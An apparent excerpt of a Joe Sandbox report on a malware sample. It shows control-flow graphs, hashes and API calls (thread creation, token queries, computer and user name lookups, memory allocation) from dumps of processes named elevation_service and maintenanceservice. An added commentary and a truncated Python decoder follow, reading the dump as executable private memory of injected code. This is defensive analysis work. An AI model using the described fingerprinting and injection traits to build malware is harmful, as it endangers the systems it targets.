                                        • Instruction ID: 0a4014a1951fa1c364b71e9d3b7041d8048a6752aa969b61b9256ea71c967e7e
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: 9F61433060CA459FDF758B2C881877B7BA8FB57390F680A5EE45BC31A0DF288C468352

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 995910-995912 188 995950-995968 187->188 189 995915-995928 call 9c9970 187->189 188->189 190 99596a 188->190 196 9959b8 call 9b0df0 189->196 192 99592f 190->192 193 995970-99597b 190->193 192->189 195 995931-9a072c 192->195 197 99597d 193->197 198 9959d4 193->198 207 9a0732-9a0738 195->207 208 9a0806-9a0809 195->208 205 9959bd-9959c2 call 995d90 196->205 197->198 199 99597f-995981 197->199 202 9959d8-9959de 198->202 203 99593b-995a15 call 9b11a0 198->203 204 995983-995a38 199->204 217 9959e0 202->217 218 995994-99599c 202->218 204->218 219 995a3e 204->219 220 9959c7-9959ce 205->220 214 9a073e 207->214 215 9a0800 207->215 223 9a079d-9a07a6 208->223 214->215 216 9a0744-9a0774 214->216 215->208 222 9a06b3-9a06b7 215->222 236 9a077a-9a081c 216->236 237 9a06d5-9a06d9 216->237 217->218 233 9959e2-9959ec 217->233 225 99599e-9959f7 218->225 226 995a02 218->226 230 995a2c-995a34 219->230 231 995a1a-995a26 220->231 232 9959d0 220->232 222->223 227 9a06bd 222->227 228 9a07a8 223->228 229 9a0791-9a0793 223->229 225->226 226->193 227->223 239 9a06c3-9a07fe 227->239 228->229 242 9a07aa 228->242 240 9a07ca-9a07cc 229->240 241 9959d9-9959de call 9c2190 230->241 231->230 244 9959a1-9959b5 call 995e10 231->244 232->231 243 9959d2 232->243 234 9959ee-9959ef 233->234 235 995a62-995a6e 233->235 234->204 245 9959f1 234->245 252 995a70 235->252 253 995a75-995ab3 call 9b1280 235->253 236->223 249 9a06db 237->249 250 9a06df 237->250 239->215 241->217 241->218 242->240 243->241 244->196 261 995a08-995a0b 244->261 245->189 249->250 256 9a06dd 249->256 250->223 252->253 259 995a72 252->259 277 995abb-995ac9 253->277 278 995ab5 253->278 256->250 262 9ac0cc 256->262 259->253 261->218 263 995a0d 261->263 264 9ac0e8-9ac102 262->264 265 9ac0ce-9ac0d0 262->265 273 995991 263->273 274 995932 263->274 267 9ac0d2-9ac0df 264->267 268 9ac104 264->268 265->267 276 9ac0e7 267->276 268->267 268->276 273->274 275 995993 273->275 275->218 279 995af2-995af5 277->279 278->277 280 995ab7-995ab9 278->280 284 995adb-995adc 279->284 285 995ad5 279->285 280->277 286 995ae2 284->286 287 995a45-995a46 284->287 285->284 288 995ad7-995ad9 285->288 286->287 289 995ae8 286->289 288->284 289->279
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: 8fceb520db467d50f50b7a6d392188be37ef6567eaa8d8ed10de84621d20dec2
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: CAF1282171CE488FDB6A971C59513FA73D2F7DA320F99459EE04FC3296DD289C468382

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 340 995b42-995b47 call 995d90 342 995b4c-995b52 340->342 344 995b0d 342->344 345 995c42-995c62 call 9b1280 342->345 344->345 346 995b13 344->346 356 995c68 345->356 357 995c24 345->357 348 995c8f-995c96 346->348 350 995c29 348->350 351 995c98-995c9a 348->351 354 995c2f-995c36 350->354 355 995cc2-995cc9 call 9952a0 350->355 353 995c9c 351->353 361 995bfa 353->361 362 995d0e-995d18 353->362 354->355 360 995c3c 354->360 372 995c69 355->372 373 995ccb 355->373 363 995c14-995c19 357->363 364 995c26 357->364 360->340 361->362 366 995c00 361->366 367 995d1a 362->367 368 995d54 362->368 369 995cc0 363->369 370 995c20-995c21 363->370 364->363 371 995c28 364->371 366->363 376 995d4b-995d52 367->376 369->355 370->356 371->350 374 995b68-995d75 372->374 375 995c6f 372->375 373->353 377 995ccd 373->377 375->374 379 995c75 375->379 376->368 380 995d45-995d47 376->380 377->353 381 995ccf-995cdd 377->381 379->348 383 995d49 380->383 384 995d5f 380->384 382 995cdf-995ce4 CreateThread 381->382 385 995cea 382->385 386 995c01-995d41 382->386 383->376 383->384 389 995d65 384->389 385->386 387 995cf0-995cf6 385->387 386->376 397 995d43 386->397 387->370 390 995cff-995d01 387->390 389->389 391 995bb4 390->391 392 995d07 390->392 394 995cda-995cdd 391->394 392->391 395 995d0d 392->395 394->382 397->368
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 73e7bccd0938c447e1933088e2ec6cb52898ce5f2e8c7f0ebe3bee80ff00ba16
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 8E21B23020CF458FDF6B9B2C845877766E9AB59311F5B09A68087CF2D6EA28CC44D356

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 995b09-995b3b 402 995cff-995d01 398->402 403 995bb4-995ce4 CreateThread 402->403 404 995d07 402->404 408 995cea 403->408 409 995c01-995d41 403->409 404->403 406 995d0d 404->406 408->409 410 995cf0-995cf6 408->410 416 995d4b-995d52 409->416 417 995d43 409->417 410->402 412 995c20-995c68 410->412 418 995d54 416->418 419 995d45-995d47 416->419 417->418 420 995d49 419->420 421 995d5f 419->421 420->416 420->421 422 995d65 421->422 422->422
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: b1c092ac289358fcd98f21ad272b8a8429bc7eb2b7edbf372381929755e1c95a
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: 6A01927010DF468FDF67572C9C1837B77D4AB55324F2B09ABC4C7CA0D5EA684905A712

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 423 995b87-995b99 CreateThread 426 995cff-995d01 423->426 427 995bb4-995ce4 CreateThread 426->427 428 995d07 426->428 432 995cea 427->432 433 995c01-995d41 427->433 428->427 430 995d0d 428->430 432->433 434 995cf0-995cf6 432->434 440 995d4b-995d52 433->440 441 995d43 433->441 434->426 436 995c20-995c68 434->436 442 995d54 440->442 443 995d45-995d47 440->443 441->442 444 995d49 443->444 445 995d5f 443->445 444->440 444->445 446 995d65 445->446 446->446
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: e0bec9f308ab4e61039d39e5155d7732c80c334bdbdf0158e00e3f997bafe22b
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: B9E0863060DF444FDF5B9B28981031A3AE5EB88310F1A05DEC44AD71D1DB6949058792

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 447 99599b-99599e 448 9959f7 447->448 449 995a02 448->449 451 99597d 449->451 452 9959d4 449->452 451->452 453 99597f-995981 451->453 454 9959d8-9959de 452->454 455 99593b-995a15 call 9b11a0 452->455 456 995983-995a38 453->456 461 9959e0 454->461 462 995994-99599c 454->462 456->462 463 995a3e 456->463 461->462 467 9959e2-9959ec 461->467 462->449 465 99599e 462->465 466 995a2c-995a34 463->466 465->448 470 9959d9-9959de call 9c2190 466->470 468 9959ee-9959ef 467->468 469 995a62-995a6e 467->469 468->456 471 9959f1 call 9c9970 468->471 473 995a70 469->473 474 995a75-995ab3 call 9b1280 469->474 470->461 470->462 483 9959b8 call 9b0df0 471->483 473->474 478 995a72 473->478 487 995abb-995ac9 474->487 488 995ab5 474->488 478->474 486 9959bd-9959c2 call 995d90 483->486 492 9959c7-9959ce 486->492 490 995af2-995af5 487->490 488->487 491 995ab7-995ab9 488->491 503 995adb-995adc 490->503 504 995ad5 490->504 491->487 493 995a1a-995a26 492->493 494 9959d0 492->494 493->466 497 9959a1-9959b5 call 995e10 493->497 494->493 496 9959d2 494->496 496->470 497->483 502 995a08-995a0b 497->502 502->462 507 995a0d 502->507 505 995ae2 503->505 506 995a45-995a46 503->506 504->503 508 995ad7-995ad9 504->508 505->506 509 995ae8 505->509 511 995991 507->511 512 995932 507->512 508->503 509->490 511->512 513 995993 511->513 513->462
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: c1e66d732b224f527dca0f85ec48c694ce6112ecfa8866b0668fb00bc32206c6
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 3C01D66090EE80CFFF17A71C405537B6555B794330FAB095AA08ACB192C8384D009746

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 514 998090-998096 515 998184 514->515 516 99818c-998192 515->516 517 998186 CloseHandle 515->517 518 998115-998118 516->518 519 998194 516->519 517->516 520 998119-99811a 518->520 521 9980a7 518->521 519->518 522 99819a 519->522 520->521 523 99811c 520->523 524 99813c 522->524 525 99820f 523->525 524->515 526 99808e-998096 525->526 527 998215-99821e 525->527 526->515 526->521 527->526 529 998224 527->529 530 9981d7-9981e6 call 9c715c 529->530 531 998226 529->531 541 998089 530->541 542 9980ca-99810f GetTokenInformation 530->542 531->530 532 998228-9982ee call 995d90 531->532 543 99830c-99831e 532->543 544 9982f0 532->544 541->542 546 99808b 541->546 547 99812d 542->547 548 998111 542->548 550 9982a1-9982ba call 995d90 call 99ec00 543->550 551 998320 543->551 544->543 549 9982f2 544->549 552 99808c 546->552 556 9980a8 547->556 557 998133 547->557 548->547 554 998113 548->554 555 9982f7-9982fc call 995d90 549->555 550->551 551->555 558 998322 551->558 552->526 554->518 575 998253-998265 call 9b1280 555->575 576 998302 555->576 560 9980aa-9980ad 556->560 557->524 562 9981ed-9981f0 557->562 558->555 563 998324-998326 558->563 565 998163-998170 call 9c7164 560->565 566 9980b3-998203 560->566 567 9980da-9980f1 562->567 568 9981f6 562->568 570 998328 563->570 565->517 586 998172 565->586 566->565 584 998209 566->584 567->560 568->567 574 9981fc 568->574 581 9982df-99832b 570->581 582 998335 570->582 580 9981fe-998201 GetTokenInformation 574->580 575->570 591 99826b 575->591 576->575 583 998308-99830a 576->583 580->525 599 9981b7 580->599 581->582 593 99832d-998331 581->593 590 99826e-998285 582->590 583->543 586->516 595 99829b-99829d 590->595 596 998287 590->596 591->590 598 998239 591->598 593->582 595->550 597 99824c 596->597 597->595 602 99824e-998252 597->602 598->570 600 99823f-998243 598->600 599->525 601 9981b9-9981ca 599->601 600->555 600->597 605 9981d0 601->605 606 9980f3 601->606 602->590 605->580 611 9980c3 605->611 606->552 608 9980f5 606->608 608->552 612 998077 608->612 611->580 613 9980c9 611->613 612->530 613->542
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 0ebfad7ed046831af2fc8c07419aed7eb621a9afe250e7e6715db5aeb8359688
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 32C04C6152D946966E79064C1C1B0B726589603755B1C084E9C0685220DE598E8351AB

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 614 99817f 615 998184 614->615 616 99818c-998192 615->616 617 998186 CloseHandle 615->617 618 998115-998118 616->618 619 998194 616->619 617->616 620 998119-99811a 618->620 621 9980a7 618->621 619->618 622 99819a 619->622 620->621 623 99811c 620->623 624 99813c 622->624 625 99820f 623->625 624->615 626 99808e-998096 625->626 627 998215-99821e 625->627 626->615 626->621 627->626 629 998224 627->629 630 9981d7-9981e6 call 9c715c 629->630 631 998226 629->631 641 998089 630->641 642 9980ca-99810f GetTokenInformation 630->642 631->630 632 998228-9982ee call 995d90 631->632 643 99830c-99831e 632->643 644 9982f0 632->644 641->642 646 99808b 641->646 647 99812d 642->647 648 998111 642->648 650 9982a1-9982ba call 995d90 call 99ec00 643->650 651 998320 643->651 644->643 649 9982f2 644->649 652 99808c 646->652 656 9980a8 647->656 657 998133 647->657 648->647 654 998113 648->654 655 9982f7-9982fc call 995d90 649->655 650->651 651->655 658 998322 651->658 652->626 654->618 675 998253-998265 call 9b1280 655->675 676 998302 655->676 660 9980aa-9980ad 656->660 657->624 662 9981ed-9981f0 657->662 658->655 663 998324-998326 658->663 665 998163-998170 call 9c7164 660->665 666 9980b3-998203 660->666 667 9980da-9980f1 662->667 668 9981f6 662->668 670 998328 663->670 665->617 686 998172 665->686 666->665 684 998209 666->684 667->660 668->667 674 9981fc 668->674 681 9982df-99832b 670->681 682 998335 670->682 680 9981fe-998201 GetTokenInformation 674->680 675->670 691 99826b 675->691 676->675 683 998308-99830a 676->683 680->625 699 9981b7 680->699 681->682 693 99832d-998331 681->693 690 99826e-998285 682->690 683->643 686->616 695 99829b-99829d 690->695 696 998287 690->696 691->690 698 998239 691->698 693->682 695->650 697 99824c 696->697 697->695 702 99824e-998252 697->702 698->670 700 99823f-998243 698->700 699->625 701 9981b9-9981ca 699->701 700->655 700->697 705 9981d0 701->705 706 9980f3 701->706 702->690 705->680 711 9980c3 705->711 706->652 708 9980f5 706->708 708->652 712 998077 708->712 711->680 713 9980c9 711->713 712->630 713->642
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: 6a90d42bd3a293ff1465b01179d1ac86244813da0b9dac14497396e5d752d484
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 5DC092A055C509876D38268C2C0A0B3355C8613760F0C481FEC068A360DE598D8351B2

                                        Execution Graph

                                        Execution Coverage: 3.7%
                                        Dynamic/Decrypted Code Coverage: 97.8%
                                        Signature Coverage: 0%
                                        Total number of Nodes: 93
                                        Total number of Limit Nodes: 5
                                        execution_graph 5567 cd55ef 5570 cd55ac 5567->5570 5569 cd55e9 5570->5569 5571 cf3870 5570->5571 5572 cf3876 5571->5572 5574 cf3893 5572->5574 5575 cf3720 5572->5575 5574->5570 5578 ce0c42 5575->5578 5576 cf37dd 5576->5574 5577 cde050 VirtualAlloc 5577->5578 5578->5575 5578->5576 5578->5577 5611 cd5b09 5612 cd5b16 5611->5612 5613 cd5c01 5612->5613 5614 cd5d0d 5612->5614 5615 cd5cdf CreateThread 5612->5615 5616 cd5c03 CloseHandle 5613->5616 5618 cd5c20 5613->5618 5615->5613 5619 cd54a0 5615->5619 5617 cd5d37 5616->5617 5579 cd55e4 5580 cd55ac 5579->5580 5580->5579 5581 cf3870 VirtualAlloc 5580->5581 5582 cd55e9 5580->5582 5581->5580 5494 cd5b87 CreateThread 5495 cd5b1c 5494->5495 5504 cd5810 5494->5504 5496 cd5c01 5495->5496 5497 cd5d0d 5495->5497 5498 cd5cdf CreateThread 5495->5498 5499 cd5c03 CloseHandle 5496->5499 5500 cd5c20 5496->5500 5498->5496 5502 cd54a0 5498->5502 5501 cd5d37 5499->5501 5503 cd54b5 5502->5503 5505 cd5822 5504->5505 5512 cd5b00 5513 cd5bba 5512->5513 5520 ce52c0 5513->5520 5515 cd5bc7 5519 cd5bde 5515->5519 5525 cf0080 5515->5525 5521 ce52c6 5520->5521 5524 ce52ce 5520->5524 5521->5524 5539 cde050 5521->5539 5524->5515 5531 cf0089 5525->5531 5526 cf03e0 GetComputerNameW 5526->5531 5527 cf0181 VirtualFree 5527->5531 5528 cde050 VirtualAlloc 5528->5531 5529 cf03bf GetUserNameW 5529->5531 5530 cf04d6 GetComputerNameW 5530->5531 5531->5526 5531->5527 5531->5528 5531->5529 5531->5530 5532 cd5c7b 5531->5532 5533 cd8070 5532->5533 5537 cd8075 5533->5537 5534 cd8186 CloseHandle 5534->5537 5535 cd81ad GetTokenInformation 5535->5537 5536 cd80ca GetTokenInformation 5536->5537 5537->5534 5537->5535 5537->5536 5538 cd80a7 5537->5538 5538->5519 5540 cde0c3 5539->5540 5541 cde0d8 VirtualAlloc 5540->5541 5541->5540 5560 cd5860 5561 ce52c0 VirtualAlloc 5560->5561 5562 cd5869 5561->5562 5563 cf0080 5 API calls 5562->5563 5564 cd587d 5563->5564 5565 cd8070 3 API calls 5564->5565 5566 cd5870 5565->5566 5542 cd5be2 5543 cd5bfc CloseHandle 5542->5543 5544 cd5be7 5542->5544 5543->5544 5546 cd5b42 5547 cd5b07 5546->5547 5547->5546 5548 cd5cdf CreateThread 5547->5548 5549 cd5b68 5547->5549 5550 cd5c01 5548->5550 5553 cd54a0 5548->5553 5551 cd5c20 5550->5551 5552 cd5c03 CloseHandle 5550->5552 5552->5549 5506 cd81b1 5508 cd8075 5506->5508 5507 cd8186 CloseHandle 5507->5508 5508->5507 5509 cd81ad GetTokenInformation 5508->5509 5510 cd80ca GetTokenInformation 5508->5510 5511 cd80a7 5508->5511 5509->5508 5510->5508 5554 cd8090 5556 cd8075 5554->5556 5555 cd8186 CloseHandle 5555->5556 5556->5555 5557 cd80a7 5556->5557 5558 cd80ca GetTokenInformation 5556->5558 5559 cd81ad GetTokenInformation 5556->5559 5558->5556 5559->5556 5583 cd57f0 5584 cd55ac 5583->5584 5585 cd55e9 5584->5585 5586 cf3870 VirtualAlloc 5584->5586 5586->5584

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 314 cd52a0-cd52a5 315 cd532e-cd533f 314->315 316 cd52ab-cd52f5 314->316 320 cd536b-cd5390 315->320 316->315 319 cd52f7 316->319 321 cd53fe 319->321 327 cd53c3 320->327 328 cd5392-cd539a 320->328 323 cd5404-cd540e 321->323 324 d10d4c-d10d4e 321->324 326 cd5424 323->326 329 cd539b 326->329 330 cd542a 326->330 328->329 331 cd539d-cd53a1 329->331 332 cd5413-cd5419 329->332 330->329 333 cd5430-cd5443 330->333 334 cd53a7 331->334 335 cd52b0-cd52b5 331->335 334->335 336 cd53ad 334->336 337 cd53af-cd53f1 336->337 338 cd53f3-cd53f9 336->338 337->332 337->338 338->321 341 cd5322-cd5328 338->341 342 cd532a 341->342 343 cd5355 341->343 342->343 344 cd532c 342->344 346 cd52e8-cd5363 343->346 347 cd52d1-cd52e7 343->347 344->315 350 cd5365 346->350 351 cd53d1-cd53d5 346->351 347->346 350->351 352 cd5367-cd5369 350->352 351->331 353 cd53d7 351->353 352->320 355 cd534b 353->355 356 cd5400-cd540e 353->356 355->356 357 cd5351-cd5353 355->357 356->326 357->343
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 00CD53C4
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: a1710b2ed5386c05852ea9c7e8ae72828403fdd03fcbc91fccc6e0878259c622
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 984128A180DE958FD72A422948643717BD09B223E2F9D04D7D3E3CB3F6D2984D859727

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 cf0080-cf0286 2 cf028c 0->2 3 cf0099-cf0575 0->3 5 cf0445 2->5 7 cf057b 3->7 8 cf0155 3->8 5->3 6 cf044b-cf0457 5->6 9 cf0458-cf0472 GetComputerNameW 6->9 7->8 10 cf0581-cf0587 7->10 11 cf02ef-cf0495 call cde050 * 2 8->11 15 cf03ee-cf03f4 9->15 16 cf024c-cf0253 9->16 13 cf058b 10->13 11->9 50 cf043e 11->50 18 cf058c-cf0591 13->18 19 cf0181 VirtualFree 13->19 37 cf00da-cf023f 15->37 38 cf03fa 15->38 23 cf01e6 16->23 24 cf0255 16->24 21 cf04ab-cf04af 18->21 22 cf0597 18->22 20 cf01a8-cf02ac call d07164 19->20 28 cf02b1-cf02be 20->28 48 cf04c7 21->48 22->21 30 cf059d 22->30 27 cf01ec-cf0313 call d0715c 23->27 23->28 31 cf02d3 24->31 53 cf0318-cf031e 27->53 33 cf03bf-cf03d9 GetUserNameW 28->33 34 cf02c4 28->34 30->21 31->23 36 cf02d9 31->36 43 cf0331 33->43 34->33 44 cf02ca 34->44 36->11 37->16 51 cf0241-cf024a 37->51 38->37 45 cf0400 38->45 54 cf0337 43->54 55 cf0171 43->55 44->31 52 cfb1ee-cfb49f 45->52 59 cf04cc-cf04e6 call d09970 GetComputerNameW 48->59 50->5 51->16 51->28 57 cf0568-cf056b 53->57 58 cf0324 53->58 54->55 56 cf033d 54->56 60 cf013f-cf0146 55->60 61 cf0173 55->61 63 cf05d0-cf05d9 56->63 57->59 58->57 65 cf032a 58->65 70 cf04ec-cf0514 59->70 71 cf0131 59->71 60->13 62 cf0230 61->62 62->48 67 cf0236-cf05c2 62->67 63->52 65->43 67->48 74 cf05c8-cf05c9 67->74 70->57 72 cf0089-cf008c 71->72 73 cf0137 71->73 72->20 76 cf0092 72->76 73->72 77 cf013d 73->77 74->63 76->20 78 cf0098 76->78 77->19 77->60 78->3
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: de7ae2bea8f0cd1f3d677937731973d3fdc963722b5b2005cf6e84b8bb98d6e8
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: 94D13531418B0D8BC7A8EF58C8457FAB7D1FBA0710F28461FDA56C7166DA749A44C6C3

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 cd8070-cd817e 81 cd813d-cd81a5 79->81 82 cd8180 79->82 95 cd81bd-cd81ca 81->95 96 cd81a7 81->96 83 cd815f 82->83 84 cd8184 82->84 83->81 88 cd8161 83->88 85 cd818c-cd8192 84->85 86 cd8186 CloseHandle 84->86 90 cd8115-cd8118 85->90 91 cd8194 85->91 86->85 92 cd8163-cd8170 call d07164 88->92 93 cd8119-cd811a 90->93 94 cd80a7 90->94 91->90 97 cd819a 91->97 92->86 104 cd8172 92->104 93->94 99 cd811c 93->99 107 cd81d0 95->107 108 cd80f3 95->108 100 cd813c 97->100 102 cd820f 99->102 100->84 105 cd808e-cd8096 102->105 106 cd8215-cd821e 102->106 104->85 105->84 105->94 106->105 118 cd8224 106->118 115 cd81fe-cd8201 GetTokenInformation 107->115 116 cd80c3 107->116 109 cd808c 108->109 110 cd80f5 108->110 109->105 110->109 117 cd8077 110->117 115->102 128 cd81b7 115->128 116->115 120 cd80c9 116->120 121 cd81d7-cd81de call d0715c 117->121 118->121 122 cd8226 118->122 124 cd80ca-cd80d8 GetTokenInformation 120->124 130 cd81e3-cd81e6 121->130 122->121 125 cd8228-cd82ee call cd5d90 122->125 127 cd810f 124->127 146 cd830c-cd831e 125->146 147 cd82f0 125->147 133 cd812d 127->133 134 cd8111 127->134 128->102 132 cd81b9-cd81bb 128->132 130->124 142 cd8089 130->142 132->95 137 cd80a8 133->137 138 cd8133 133->138 134->133 140 cd8113 134->140 144 cd80aa-cd80ad 137->144 138->100 141 cd81ed-cd81f0 138->141 140->90 148 cd80da-cd80f1 141->148 149 cd81f6 141->149 142->124 145 cd808b 142->145 144->92 150 cd80b3-cd8203 144->150 145->109 153 cd82a1-cd82ba call cd5d90 call cdec00 146->153 154 cd8320 146->154 147->146 155 cd82f2 147->155 148->144 149->148 151 cd81fc 149->151 150->92 156 cd8209 150->156 151->115 153->154 159 cd82f7-cd82fc call cd5d90 154->159 160 cd8322 154->160 155->159 168 cd8253-cd8265 call cf1280 159->168 169 cd8302 159->169 160->159 163 cd8324-cd8326 160->163 167 cd8328 163->167 174 cd82df-cd832b 167->174 175 cd8335 167->175 168->167 181 cd826b 168->181 169->168 173 cd8308-cd830a 169->173 173->146 174->175 182 cd832d-cd8331 174->182 177 cd826e-cd8285 175->177 179 cd829b-cd829d 177->179 180 cd8287 177->180 179->153 183 cd824c 180->183 181->177 184 cd8239 181->184 182->175 183->179 186 cd824e-cd8252 183->186 184->167 185 cd823f-cd8243 184->185 185->159 185->183 186->177
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction ID: 6ca86fe024f6c18844252e790da2b24cabfc4f0b2cc59f9f263ef4ab3ca4886f
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: 8C61667050CA459FC7699B29885433EBBA0FB55350F58065BD72BC33A0DF24AE0E9352
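                                        The "Source File" name above encodes the attributes of the memory region the code was dumped from, which is the detail a triager needs: 0x40 / 0x1000 / 0x20000 are the documented Windows PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE values, and "based on PE: false" says the region is not an image mapping, i.e. writable, executable, private memory of the kind injected or unpacked code lives in. The decoder below is an added example, not Joe Sandbox's or the sample's code. The field layout `<process index>.<dump round>.<id>.<base>.<protect>.<state>.<type>.<unused>.sdmp` is my assumption, inferred from the two dump names that appear in this report and corroborated only by the snapshot file name (hcaresult_11_2_cd0000_…); the constants are the winnt.h values. The `rva` helper checks the observation that functions in the process-11 dump (base 0xCD0000) and the process-13 dump (base 0x540000) sit at the same offsets, e.g. cd8070 and 548070.

```python
"""Decode the memory-region attributes encoded in a Joe Sandbox .sdmp name.

Added example, not Joe Sandbox code. ASSUMPTION: the name layout
  <proc index>.<dump round>.<id>.<base>.<protect>.<state>.<type>.<unused>.sdmp
is inferred from the dump names in this report; only the process index,
dump round and base are corroborated by the snapshot file name.
"""
import re
from dataclasses import dataclass

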